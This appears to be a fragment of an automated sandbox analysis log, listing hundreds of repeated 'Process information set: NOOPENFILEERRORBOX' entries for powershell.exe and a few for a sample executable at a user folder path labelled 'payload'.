Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
